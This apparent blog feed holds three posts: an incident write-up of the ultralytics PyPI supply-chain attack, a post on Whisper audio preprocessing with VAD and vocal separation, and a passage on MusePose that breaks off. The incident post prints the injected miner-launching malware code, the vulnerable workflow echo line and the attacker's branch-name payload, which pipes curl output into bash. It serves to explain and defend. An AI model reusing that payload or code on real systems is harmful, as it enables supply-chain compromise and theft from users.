            <content:encoded><![CDATA[<p>On 2024–12–05, there was an attack on <a href="https://github.com/ultralytics/ultralytics">ultralytics</a>, and it was successful.</p><p>Ultralytics is a widely used package for object detection and segmentation, especially in many AI projects. As of today, 2024–12–07, it has 33k+ stars on GitHub. One of my projects also uses the package.</p><p>The attacker, <a href="https://github.com/openimbot">openimbot</a>, managed to embed this code into the ultralytics project:</p><pre>def safe_run(path):<br>    os.chmod(path, 0o770)<br>    command = [<br>        path,<br>        &#39;-u&#39;,<br>        &#39;4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw&#39;,<br>        &#39;-o&#39;,<br>        &#39;connect.consrensys.com:8080&#39;,<br>        &#39;-k&#39;<br>    ]<br>    process = subprocess.Popen(<br>        command,<br>        stdin=subprocess.DEVNULL,<br>        stdout=subprocess.DEVNULL,<br>        stderr=subprocess.DEVNULL,<br>        preexec_fn=os.setsid,<br>        close_fds=True<br>    )<br>    os.remove(path)</pre><p>What does it do?</p><ul><li>It makes the file executable with os.chmod.</li><li>It executes a command to connect to connect.consrensys.com:8080, which is probably running a cryptomining job. But it’s not <em>just</em> cryptomining malware.</li><li>It installs <strong>another malicious executable</strong> file into the path.</li><li>After the file is executed, it deletes the file to remove the evidence.</li></ul><p>Since it also executes the malicious file rather than just running a cryptomining job, it could be a full-blown infostealer or anything else. So I think we can say that <strong>its severity is very high</strong>.</p><p>How did the attacker get this code in? 
Here’s the sequence of events:</p><h4>Sequence of Events (UTC Time)</h4><ol><li>2024–12–04 19:33 <br>- The attacker, <a href="https://github.com/openimbot">openimbot</a>, opened <a href="https://github.com/ultralytics/ultralytics/pull/18018">PR #18018</a></li><li>2024–12–04 19:57<br>- The attacker, <a href="https://github.com/openimbot">openimbot</a>, opened <a href="https://github.com/ultralytics/ultralytics/pull/18020">PR #18020</a></li><li>2024–12–04 20:50<br>- The malicious version v8.3.41 <a href="https://github.com/ultralytics/ultralytics/actions/runs/12176650710">was released on PyPI</a> by GitHub Actions</li><li>2024–12–05 06:34 <br>- The compromised version was noticed in an <a href="https://github.com/ultralytics/ultralytics/issues/18027">issue</a></li><li>2024–12–05 09:15 <br>- v8.3.41 was <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2523755580">removed from PyPI</a></li><li>2024–12–05 12:46<br>- The malicious version v8.3.42 <a href="https://github.com/ultralytics/ultralytics/actions/runs/12180037832">was released on PyPI</a> by GitHub Actions</li><li>2024–12–05 13:47 <br>- v8.3.42 was <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2523755580">removed from PyPI</a></li><li>2024–12–05 19:09<br>- Ultralytics team member glenn-jocher opened <a href="https://github.com/ultralytics/ultralytics/pull/18052">PR #18052</a></li><li>2024–12–05 19:47<br>- The safe version v8.3.43 <a href="https://github.com/ultralytics/ultralytics/actions/runs/12186963815">was released on PyPI</a> by GitHub Actions</li></ol><h4>How?</h4><p>In <a href="https://github.com/ultralytics/ultralytics/pull/18018">PR #18018</a> and <a href="https://github.com/ultralytics/ultralytics/pull/18020">PR #18020</a>, the attacker was able to make the GitHub Actions CI/CD pipeline run malicious code via <a href="https://owasp.org/www-community/attacks/Command_Injection"><strong>command injection</strong></a>.</p><p>It works the 
same as <a href="https://learn.microsoft.com/en-us/sql/relational-databases/security/sql-injection?view=sql-server-ver16">SQL Injection</a>: you inject a string containing commands, and somehow they actually get executed. It’s simple, and also easy to prevent, but when it succeeds it can be critical, because it literally executes arbitrary commands.</p><p>The details of how this was possible are well documented in the <a href="https://github.com/advisories/GHSA-7x29-qqmq-v6qc">Github Advisory Report</a>, which reported this vulnerability prior to the attack.</p><p>The key weakness the attacker exploited is this echo in a shell step of the workflow:</p><pre>run:<br>    echo &quot;github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}&quot;</pre><p>Some of you (me, at least) might think that using echo in a shell script is no big deal; it’s just for logging, like print. But if you’re working with infrastructure like GitHub Actions, and you’re able to run shell script there, <strong>echo needs to be used carefully, as it can execute code through the </strong><a href="https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html"><strong>Command Substitution syntax</strong></a><strong> </strong><strong>$(...) 
in the shell.</strong></p><p>In short, this is the kind of thing the attacker can do:</p><pre>echo $(expr 1 + 2)<br># prints 3</pre><p><strong>There was a line of </strong><strong>echo “${{ github.event.pull_request.head.ref }}” in the Github Action, and the</strong> <strong>attacker got full control of the runner’s shell through the PR branch name.</strong></p><p>This was the branch name used by the attacker in <a href="https://github.com/ultralytics/ultralytics/pull/18018">PR #18018</a>:</p><pre>openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)</pre><p>This downloads and executes a custom shell script, which in turn triggered the deployment of the malicious versions of the package. The malicious versions v8.3.41 and v8.3.42 were successfully released and listed on PyPI for more than 12 hours in total.</p><p>The PyPI administrators provided the <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2523755580">timeline of the releases</a>. People who installed ultralytics between 2024–12–04 20:51 ~ 2024–12–05 09:15 or between 2024–12–05 12:47 ~ 2024–12–05 13:47 (times in UTC) were likely infected by the malware.</p><h4>What to do &amp; Things to learn</h4><ol><li>Report to <a href="https://github.com/advisories">Github Advisory</a>. Github Advisory is where people report things exactly like this. Each submission is reviewed by the GitHub Security Lab curation team, rated for severity, and published to the DB.</li><li>Since one of my projects uses this package as well, notify affected users as widely as possible. People who may have installed ultralytics between 2024–12–04 20:51 ~ 2024–12–05 09:15 or between 2024–12–05 12:47 ~ 2024–12–05 13:47 are likely infected with malware. 
Since it’s a really popular package that many people use, it’s worth notifying people.<br>I made an issue about it and pinned it: <a href="https://github.com/jhj0517/AdvancedLivePortrait-WebUI/issues/19">https://github.com/jhj0517/AdvancedLivePortrait-WebUI/issues/19</a></li><li>I think it could have been prevented much earlier because the vulnerability was reported in the Github Advisory long before the attack — <a href="https://github.com/advisories/GHSA-7x29-qqmq-v6qc">GHSA-7x29-qqmq-v6qc</a>. <br>Reading the Github Advisory can sometimes help you secure your project.</li></ol><h3>Reference</h3><ul><li><a href="https://github.com/ultralytics/ultralytics/issues/18027">https://github.com/ultralytics/ultralytics/issues/18027</a></li><li><a href="https://portswigger.net/web-security/os-command-injection">https://portswigger.net/web-security/os-command-injection</a></li><li><a href="https://github.com/advisories/GHSA-7x29-qqmq-v6qc">https://github.com/advisories/GHSA-7x29-qqmq-v6qc</a></li><li><a href="https://matklad.github.io/2021/07/30/shell-injection.html">https://matklad.github.io/2021/07/30/shell-injection.html</a></li><li><a href="https://www.reddit.com/r/commandline/comments/4d4oq4/linuxsecurity_echo_injection/">https://www.reddit.com/r/commandline/comments/4d4oq4/linuxsecurity_echo_injection/</a></li><li><a href="https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html">https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c84338b639c7" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Audio Pre-Processings For Better Results in the Transcription Pipeline]]></title>
            <link>https://medium.com/@developerjo0517/audio-pre-processings-for-better-results-in-the-transcription-pipeline-bab1e8f63334?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/bab1e8f63334</guid>
            <category><![CDATA[whisper]]></category>
            <category><![CDATA[transcription]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[openai]]></category>
            <category><![CDATA[deep-learning]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Sun, 29 Sep 2024 12:58:28 GMT</pubDate>
            <atom:updated>2025-01-07T13:38:03.720Z</atom:updated>
<content:encoded><![CDATA[<p><a href="https://github.com/openai/whisper"><strong>Whisper</strong></a> is currently the state-of-the-art speech-to-text model.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cMke9qdC4EvowVEDquVCjw.png" /><figcaption>Whisper Architecture</figcaption></figure><p><a href="https://cdn.openai.com/papers/whisper.pdf">Robust Speech Recognition via Large-Scale Weak Supervision</a> was proposed by Alec Radford, Jong Wook Kim, Tao Xu, Greg Brockman, Christine McLeavey, and Ilya Sutskever. <br>The model is implemented as an encoder-decoder transformer and is trained on 680K hours of labeled multilingual audio data. During transcription, the audio is split into 30-second chunks, and each chunk is fed into the model.</p><p>For more information on Whisper’s architecture, see the paper linked above.</p><p>Since Whisper was open-sourced in 2022, many applications have been built on it, from transcribing video subtitles to serving as part of speech-to-speech pipelines.</p><p>Ideally, the input audio should be clean (no background music and little noise), as this type of noise in the input audio often causes <a href="https://en.wikipedia.org/wiki/Hallucination_(artificial_intelligence)">hallucinations</a>.</p><p>As you can see in this <a href="https://github.com/jhj0517/Whisper-WebUI/issues/152#issue-2302060091">Whisper-WebUI issue</a>, the most common hallucination in Whisper is repeating a specific word, with the transcription getting stuck at a specific part. 
Another is when the <a href="https://github.com/jhj0517/Whisper-WebUI/issues/249">transcription starts too early</a>.</p><pre>[00:00.000 --&gt; 00:02.000]  You<br>[00:30.000 --&gt; 00:32.000]  You<br>[01:00.000 --&gt; 01:02.000]  You<br>[01:30.000 --&gt; 01:32.000]  You<br>[02:00.000 --&gt; 02:02.000]  You<br>[02:30.000 --&gt; 02:32.000]  You<br>[03:00.000 --&gt; 03:02.000]  You<br>[03:08.000 --&gt; 03:10.000]  You<br>[03:16.000 --&gt; 03:18.000]  You<br>[03:18.000 --&gt; 03:20.000]  You<br>[03:29.000 --&gt; 03:31.000]  You<br>[03:31.000 --&gt; 03:33.000]  You<br>[03:42.000 --&gt; 03:44.000]  You<br>[03:44.000 --&gt; 03:46.000]  You<br>[03:46.000 --&gt; 03:48.000]  You<br>[03:59.000 --&gt; 04:01.000]  You</pre><p>This type of hallucination typically occurs when the audio contains such noise. To reduce these hallucinations, some pre-processing can be applied to the audio. There are some good repositories on GitHub that wrap Whisper for better results, with lower WER (Word Error Rate) and faster transcription speed.</p><p>For example, <a href="https://github.com/SYSTRAN/faster-whisper">faster-whisper</a>, which reimplements Whisper with <a href="https://github.com/OpenNMT/CTranslate2/">CTranslate2</a> for better transcription speed and more efficient VRAM usage, uses <a href="https://github.com/snakers4/silero-vad">Silero VAD</a> to detect only human voices in the audio.</p><p>VAD (Voice Activity Detection) is the most common pre-processing technique in transcription pipelines, and it gives noticeably better results than not using it. In faster-whisper, VAD is implemented by first removing all non-voice segments, feeding only the detected voice to Whisper, and then restoring the original timestamps in the transcription pipeline.</p><p>A really good thing about VAD is that it’s super light and fast. 
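</p><p>By the way, that restore step is simple bookkeeping. Here is a simplified, hypothetical sketch (the function name is mine, not faster-whisper’s API, and it shifts each segment wholly by the chunk it starts in, while the real implementation also handles segments that span chunk boundaries):</p>

```python
def restore_timestamps(segments, speech_chunks):
    """Map segment times from the concatenated voice-only audio
    back to the original audio's timeline.

    segments:      [(start, end, text)] in concatenated-audio seconds
    speech_chunks: [(orig_start, orig_end)] speech regions found by the
                   VAD, in original-audio seconds
    """
    restored = []
    for seg_start, seg_end, text in segments:
        cursor = 0.0  # where the current chunk begins in the concatenated audio
        for orig_start, orig_end in speech_chunks:
            duration = orig_end - orig_start
            if seg_start < cursor + duration:
                # the segment starts inside this chunk: shift it back
                shift = orig_start - cursor
                restored.append((seg_start + shift, seg_end + shift, text))
                break
            cursor += duration
    return restored

# Speech at 0-2s and 60-63s in the original audio becomes 0-5s after VAD.
chunks = [(0.0, 2.0), (60.0, 63.0)]
segments = [(0.5, 1.5, "hello"), (2.5, 4.5, "world")]
print(restore_timestamps(segments, chunks))
# -> [(0.5, 1.5, 'hello'), (60.5, 62.5, 'world')]
```

<p>The second segment falls into the second chunk, so it is shifted forward by 58 seconds, back to its true position in the original audio.</p><p>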
According to Silero VAD, one chunk of audio (30 seconds) takes less than <strong>1 millisecond</strong> to process on a single CPU thread.</p><p>Because it runs inference on the CPU and is still super fast and lightweight, you can attach a VAD to a transcription pipeline with almost no added load.</p><p>I tried to run some benchmarks to see how effective VAD is in the transcription pipeline, but it’s difficult to find a suitable dataset for such a task. Many ASR datasets like <a href="https://www.openslr.org/12">LibriSpeech</a> or <a href="https://www.openslr.org/7/">TEDLIUM</a> are already cleaned, without much noise, and consist of speech audio files of just 2~10 seconds. Using VAD on already-clean audio only results in the same WER (Word Error Rate) before and after VAD.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t-QG8Nwlx33hD9h6GyrTDw.png" /><figcaption>Same WER with LibriSpeech-other</figcaption></figure><p>Although LibriSpeech-other has more noise than other ASR datasets, it doesn’t have enough “dirty” audio to test something like this. To benchmark this properly, the audio should be as dirty as possible while still having a reference transcription. I couldn’t find any suitable datasets, so instead of ASR datasets, the best option was to pick some real-world samples and compare them.</p><p>Let’s take a look at a real-world example of Whisper hallucinating due to noise. Here’s a 1-minute-30-second sample from <a href="https://www.youtube.com/watch?v=Eek0cOjLrV0&amp;ab_channel=0517jhj">The Joe Schmo Show (2003)</a>.</p><p>Any TV show or movie scene makes a good noisy audio sample, because we often face audio like this in the real world. This sample has a long stretch of low-pitched sound from about 0:03 to 1:05, almost a minute, that adds continuous tension to the show. 
<br>Such continuous noise often causes hallucinations in Whisper because the model is easily confused about whether it is a human voice. That’s why VAD works so well in the transcription pipeline.</p><p>This is a human-made, error-free transcription of the sample:</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>First Flame of Love Eviction Ceremony.<br><br>2<br>00:01:09,659 --&gt; 00:01:10,659<br>Love.<br><br>3<br>00:01:11,659 --&gt; 00:01:12,659<br>It&#39;s why we&#39;re all here.<br><br>4<br>00:01:13,659 --&gt; 00:01:14,659<br>But tonight,<br><br>5<br>00:01:15,659 --&gt; 00:01:17,659<br>one of you will have to let go of love&#39;s warm bosom<br><br>6<br>00:01:17,659 --&gt; 00:01:20,659<br>and cleave to rejection&#39;s cold shoulders.<br><br>7<br>00:01:21,659 --&gt; 00:01:23,659<br>Welcome to the first<br><br>8<br>00:01:23,659 --&gt; 00:01:24,659<br>Flame-<br><br>9<br>00:01:24,659 --&gt; 00:01:26,659<br>Coming up next on Joe Schmoe 2,<br><br>10<br>00:01:26,659 --&gt; 00:01:28,659<br>the most shocking eviction yet.<br><br>11<br>00:01:28,659 --&gt; 00:01:29,659<br>Welcome to the-</pre><p>And this is the transcription using Whisper large-v2:</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>first Flame of Love Eviction Ceremony.<br><br>2<br>00:00:03,879 --&gt; 00:00:13,880<br>♪♪<br><br>3<br>00:00:13,880 --&gt; 00:00:23,879<br>♪♪<br><br>4<br>00:00:23,879 --&gt; 00:00:33,879<br>♪♪<br><br>5<br>00:00:33,879 --&gt; 00:00:43,899<br>♪♪<br><br>6<br>00:00:43,899 --&gt; 00:00:53,899<br>♪♪<br><br>7<br>00:00:53,899 --&gt; 00:01:03,920<br>♪♪<br><br>8<br>00:01:03,920 --&gt; 00:01:13,920<br>♪♪<br><br>9<br>00:01:13,920 --&gt; 00:01:23,939<br>♪♪<br><br>10<br>00:01:23,939 --&gt; 00:01:25,939<br>Coming up next on Joe Schmoe II,<br><br>11<br>00:01:25,939 --&gt; 00:01:27,939<br>the most shocking eviction yet.<br><br>12<br>00:01:27,939 --&gt; 00:01:29,939<br>Welcome to the...</pre><blockquote>For the hyperparameters, I used all the defaults from <a 
href="https://github.com/SYSTRAN/faster-whisper/blob/d57c5b40b06e59ec44240d93485a95799548af50/faster_whisper/transcribe.py#L287">faster_whisper.transcribe()</a>.</blockquote><p>Interestingly, the noise part was transcribed as ♪♪. This may indicate that Whisper’s training data contained labels for music as well, not just speech transcription. This transcription is also missing a few lines: right after the noise, some lines were simply skipped and not transcribed.</p><p>Let’s use VAD to improve this:</p><pre>1<br>00:00:00,000 --&gt; 00:00:03,000<br>Welcome to the first Flame of Love Eviction Ceremony.<br><br>2<br>00:01:14,629 --&gt; 00:01:18,629<br>But tonight, one of you will have to let go of love&#39;s warm bosom<br><br>3<br>00:01:18,629 --&gt; 00:01:21,629<br>and cleave to rejection&#39;s cold shoulder.<br><br>4<br>00:01:22,629 --&gt; 00:01:24,629<br>Welcome to the first Flame...<br><br>5<br>00:01:24,629 --&gt; 00:01:26,629<br>Coming up next on Joe Schmoe II,<br><br>6<br>00:01:26,629 --&gt; 00:01:29,629<br>the most shocking eviction yet.</pre><p>The most problematic part, the ♪♪ noise (1 minute of it), has been removed by VAD. We can say the result is better than without it. But compared to the human transcription, there are still a few lines missing right after the noise.</p><p>That’s because noise causes mistakes in the VAD too, not just in Whisper. If you attach submodels to the pipeline to get better results, you can sometimes get worse results, because the submodels make mistakes of their own. <br>Unfortunately, VAD couldn’t catch some lines right after the noise, resulting in missing lines.</p><p>Would tweaking some of the VAD hyperparameters, such as lowering min_speech_duration_ms, help it detect the missing lines? 
Let&#39;s see:</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>Welcome to the first Flame of Love Eviction Ceremony.<br><br>2<br>00:00:04,000 --&gt; 00:01:10,659<br>Love.<br><br>3<br>00:01:11,659 --&gt; 00:01:12,659<br>It&#39;s why we&#39;re all here.<br><br>4<br>00:01:13,659 --&gt; 00:01:14,659<br>But tonight,<br><br>5<br>00:01:15,659 --&gt; 00:01:17,659<br>one of you will have to let go of love&#39;s warm bosom<br><br>6<br>00:01:17,659 --&gt; 00:01:20,659<br>and cleave to rejection&#39;s cold shoulder.<br><br>7<br>00:01:21,659 --&gt; 00:01:22,659<br>Welcome to the first<br><br>8<br>00:01:23,659 --&gt; 00:01:24,659<br>Flame-<br><br>9<br>00:01:24,659 --&gt; 00:01:26,659<br>Coming up next on Joe Schmoe 2,<br><br>10<br>00:01:26,659 --&gt; 00:01:28,659<br>the most shocking eviction yet.<br><br>11<br>00:01:28,659 --&gt; 00:01:29,659<br>Welcome to the-</pre><p>It caught some of the missing lines, but at the same time produced another hallucination: from 00:04 ~ 01:10, almost a minute of noise was also detected as voice, resulting in a single “Love” stretched over a whole minute.</p><p>So tweaking such hyperparameters is also a challenge, because it can produce unexpected hallucinations like this.</p><p>The best approach would be to simply remove the noise from the audio by separating the vocals from everything else.</p><p>There’s a really cool open-source project for this, <a href="https://github.com/Anjok07/ultimatevocalremovergui">ultimatevocalremovergui</a>.</p><p>ultimatevocalremovergui is currently the state-of-the-art open-source vocal and noise separation tool. Different types of models, such as MDX and Demucs, are integrated into the repository, and it has its own ensemble pipeline that combines the models for better results.</p><p>Although I haven’t tested all of the UVR models, the ones I find most useful for the transcription pipeline are the<a href="https://github.com/ZFTurbo/MVSEP-MDX23-music-separation-model"> MDX models</a>. 
While other models, such as <a href="https://github.com/facebookresearch/demucs">Demucs</a>, focus on separating all instruments from the music, such as bass or drums, MDX models support a vocals-only separation option that’s faster and lighter, which may be best suited for the transcription pipeline.</p><p>Here’s the result using the UVR-MDX-NET-Inst_HQ_4 model from UVR together with VAD:</p><pre>1<br>00:00:00,000 --&gt; 00:00:02,000<br>Welcome to the first Flame of Love Eviction Ceremony.<br><br>2<br>00:01:09,659 --&gt; 00:01:10,659<br>Love.<br><br>3<br>00:01:11,659 --&gt; 00:01:12,659<br>It&#39;s why we&#39;re all here.<br><br>4<br>00:01:13,659 --&gt; 00:01:14,659<br>But tonight,<br><br>5<br>00:01:15,659 --&gt; 00:01:17,659<br>one of you will have to let go of love&#39;s warm bosom<br><br>6<br>00:01:17,659 --&gt; 00:01:20,659<br>and cleave to rejection&#39;s cold shoulders.<br><br>7<br>00:01:21,659 --&gt; 00:01:23,659<br>Welcome to the first<br><br>8<br>00:01:23,659 --&gt; 00:01:24,659<br>Flame-<br><br>9<br>00:01:24,659 --&gt; 00:01:26,659<br>Coming up next on Joe Schmoe 2,<br><br>10<br>00:01:26,659 --&gt; 00:01:28,659<br>the most shocking eviction yet.<br><br>11<br>00:01:28,659 --&gt; 00:01:29,659<br>Welcome to the-</pre><p>It produced the most accurate transcription of all. It wasn’t affected by the long stretch of noise and didn’t miss any lines; it only added an unnecessary “Welcome to the” at the front of the first line. 
Using UVR gives the best result so far.</p><p>For the Joe Schmo Show sample, this is the WER chart:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TqXZFNcHNjaBZz6pkx1v0g.png" /><figcaption>WER Benchmark on Joe Schmo Show</figcaption></figure><p>Adding UVR to the transcription pipeline also reduced the WER on <a href="https://www.openslr.org/12">LibriSpeech-other</a>:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xUCZtJflf9YR4J8TthVlYA.png" /><figcaption>WER Benchmark on LibriSpeech-other</figcaption></figure><p><a href="https://colab.research.google.com/github/jhj0517/Whisper-WebUI-Benchmark/blob/master/notebooks/whisper_webui_benchmark.ipynb">Picovoice/speech-to-text-benchmark</a> was used for benchmarking. The reduction wasn’t significant because the ASR dataset is already clean and close to ideal data to transcribe, but with real-world examples like the TV show above, you can often get much better results with UVR.</p><p>The disadvantage of using a UVR MDX model compared to Silero VAD is that it needs a GPU (it is significantly slower on CPU) and is not as light as VAD. With UVR-MDX-NET-Inst_HQ_4, it needed about 9GB of VRAM, and it increases transcription time.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jWcYdiwegCUpeOtwEbu8KA.png" /><figcaption>RTF Benchmark on LibriSpeech-other</figcaption></figure><p>In terms of RTF (Real Time Factor: processing time / audio duration), using VAD and UVR together in the transcription pipeline increased transcription time by about 2.5 times compared to not using them. Because UVR requires a GPU and increases transcription time, it’s not as easy to add to the transcription pipeline as VAD.</p><p>But if your main interest is lowering WER and reducing hallucinations rather than faster transcription, it’s definitely worth adding to the transcription pipeline. 
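</p><p>Since every comparison above is scored with WER, here is a minimal reference implementation of the metric itself: the word-level edit distance between hypothesis and reference, divided by the number of reference words (a generic sketch, not the exact code used by the benchmark tool):</p>

```python
def wer(reference: str, hypothesis: str) -> float:
    """Word Error Rate: word-level edit distance / number of reference words."""
    ref, hyp = reference.split(), hypothesis.split()
    # d[i][j] = edit distance between ref[:i] and hyp[:j]
    d = [[0] * (len(hyp) + 1) for _ in range(len(ref) + 1)]
    for i in range(len(ref) + 1):
        d[i][0] = i
    for j in range(len(hyp) + 1):
        d[0][j] = j
    for i in range(1, len(ref) + 1):
        for j in range(1, len(hyp) + 1):
            cost = 0 if ref[i - 1] == hyp[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution
    return d[-1][-1] / len(ref)

# One repeated word (a typical Whisper hallucination) costs one insertion:
print(wer("welcome to the first flame", "welcome to the the first flame"))
# -> 0.2
```

<p>Note that insertions raise the WER even when every reference word was recognized, which is why repetition-style hallucinations hurt the score so much.</p><p>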
For example, it works well when you are transcribing movie subtitles.</p><p>When attaching GPU-based submodels to the pipeline, it is recommended to make them opt-in and to offload them from VRAM after inference, because otherwise you might get a CUDA OutOfMemoryError.</p><p>Currently in <a href="https://github.com/jhj0517/Whisper-WebUI">Whisper-WebUI</a> the transcription pipeline is implemented as follows:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*sUAnXkxvJYReCpwXZGOz_A.png" /><figcaption>Whisper WebUI Transcription Pipeline</figcaption></figure><p>Because music separation increases processing time significantly, it would not be appropriate for a real-time transcription pipeline such as speech-to-speech conversation. However, if music separation models as lightweight as VAD become available in the future, it would be worthwhile to use them as submodels in real-time transcription pipelines as well.</p><h4>Reference</h4><ol><li><a href="https://openai.com/index/whisper/">https://openai.com/index/whisper/</a></li><li><a href="https://cdn.openai.com/papers/whisper.pdf">https://cdn.openai.com/papers/whisper.pdf</a></li><li><a href="https://github.com/jhj0517/Whisper-WebUI/issues/152#issue-2302060091">https://github.com/jhj0517/Whisper-WebUI/issues/152#issue-2302060091</a></li><li><a href="https://github.com/jhj0517/Whisper-WebUI/issues/249">https://github.com/jhj0517/Whisper-WebUI/issues/249</a></li><li><a href="https://github.com/openai/whisper/discussions/679#discussioncomment-7649183">https://github.com/openai/whisper/discussions/679#discussioncomment-7649183</a></li><li><a href="https://github.com/SYSTRAN/faster-whisper/pull/499#issuecomment-2023086569">https://github.com/SYSTRAN/faster-whisper/pull/499#issuecomment-2023086569</a></li></ol><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bab1e8f63334" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[MusePose: Transform an Image into a Dancing Video]]></title>
            <link>https://medium.com/@developerjo0517/musepose-transform-an-image-into-a-dancing-video-b31f9025a30d?source=rss-d5fe4e536d4e------2</link>
            <guid isPermaLink="false">https://medium.com/p/b31f9025a30d</guid>
            <category><![CDATA[hugging-face]]></category>
            <category><![CDATA[stable-diffusion]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[musepose]]></category>
            <category><![CDATA[generative-ai-tools]]></category>
            <dc:creator><![CDATA[0517 jhj]]></dc:creator>
            <pubDate>Thu, 13 Jun 2024 14:33:31 GMT</pubDate>
            <atom:updated>2024-06-13T14:33:31.632Z</atom:updated>
<content:encoded><![CDATA[<p><a href="https://github.com/TMElyralab/MusePose">MusePose</a> is a Generative AI project that transforms an image into a dancing video. The models and code are published on Hugging Face and GitHub, so you can try it now if you want, but the models are only available for non-commercial research purposes.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YxMVkYwWdNhWkg-xlhF6kA.gif" /><figcaption>Example Output From MusePose</figcaption></figure><p>Here’s the demo example shown in the repo. It takes 1) an image and 2) a dancing skeleton video as inputs and returns a dancing video based on them. Basically, MusePose works through a two-step process.</p><h4>Step 1: Align Skeletons from Input Image &amp; Video</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9dXTH8DOMSOEu_vXLAWEnw.gif" /><figcaption>Example Output From Step 1</figcaption></figure><p>Red numbers in the example above indicate each input and output in this step.</p><ol><li>Cell 1 → Cell 2<br>Extract the skeleton from the input image</li><li>Cell 4 → Cell 5<br>Extract the skeleton from the input dance video</li><li>Cell 5 → Cell 3<br>Align (resize) the skeleton video (Cell 5) to the skeleton image (Cell 2).</li></ol><p>So getting Cell 3 is the purpose of step 1.</p><p>This process is done with <a href="https://github.com/IDEA-Research/DWPose">DWPose</a> and requires two types of models:</p><ul><li><a href="https://huggingface.co/jhj0517/MusePose/blob/main/dwpose/yolox_l_8x8_300e_coco.pth">yolox_l_8x8_300e_coco.pth</a><br>- <a href="https://github.com/Megvii-BaseDetection/YOLOX">YoloX</a> model to detect the person in the image</li><li><a href="https://huggingface.co/yzd-v/DWPose/blob/main/dw-ll_ucoco_384.pth">dw-ll_ucoco_384.pth</a> <br>- DWPose model to extract the skeleton from the image</li></ul><p>This step uses less VRAM and time than step 2.</p><h4>Step 2: Make The Image Move with The Aligned Skeleton</h4><figure><img alt="" 
src="https://cdn-images-1.medium.com/max/720/1*zpkf5tnFhNS2wPqecG52Gw.gif" /><figcaption>Example Output From Step 2</figcaption></figure><p>Now you have a properly aligned skeleton from step 1; in step 2, MusePose makes the image move with it. This step does quite heavy work and loads <strong>7 models in total</strong>.</p><p>According to the repository, these models are loaded during step 2:</p><ul><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">denoising_unet.pth</a></li><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">motion_module.pth</a></li><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">pose_guider.pth</a></li><li><a href="https://huggingface.co/TMElyralab/MusePose/tree/main/MusePose">reference_unet.pth</a></li><li><a href="https://huggingface.co/lambdalabs/sd-image-variations-diffusers/tree/main/unet">sd-image-variations-diffusers</a></li><li><a href="https://huggingface.co/lambdalabs/sd-image-variations-diffusers/tree/main/image_encoder">image_encoder</a></li><li><a href="https://huggingface.co/stabilityai/sd-vae-ft-mse">sd-vae-ft-mse</a></li></ul><p>The top four, from denoising_unet.pth to reference_unet.pth, are models trained specifically for MusePose. The other models help generate the images according to the outputs of these four.</p><p>Since it loads 7 models, it needs a lot of VRAM: with torch.float16 dtype, at least ~17GB for this step. You can set the width and height at which this step runs as parameters, so lowering the resolution helps reduce VRAM usage and avoid CUDA out-of-memory errors, while a resolution closer to that of the input source gives a better result at the cost of more VRAM. 
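</p><p>As a rough illustration of that trade-off, here is a small, hypothetical helper (the function name and defaults are mine, not part of MusePose’s API) that scales an input down to a working resolution while keeping both sides multiples of 8, a common constraint for diffusion UNets:</p>

```python
def fit_resolution(src_w, src_h, max_side=512, multiple=8):
    """Scale (src_w, src_h) so the longer side is at most max_side,
    rounding both sides down to a multiple of `multiple`."""
    scale = min(1.0, max_side / max(src_w, src_h))
    w = int(src_w * scale) // multiple * multiple
    h = int(src_h * scale) // multiple * multiple
    return w, h

# A 1080x1920 portrait input, limited to a 768px longer side:
print(fit_resolution(1080, 1920, max_side=768))  # -> (432, 768)
```

<p>Halving max_side roughly quarters the number of pixels the UNet has to denoise, which is where the VRAM savings come from.</p><p>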
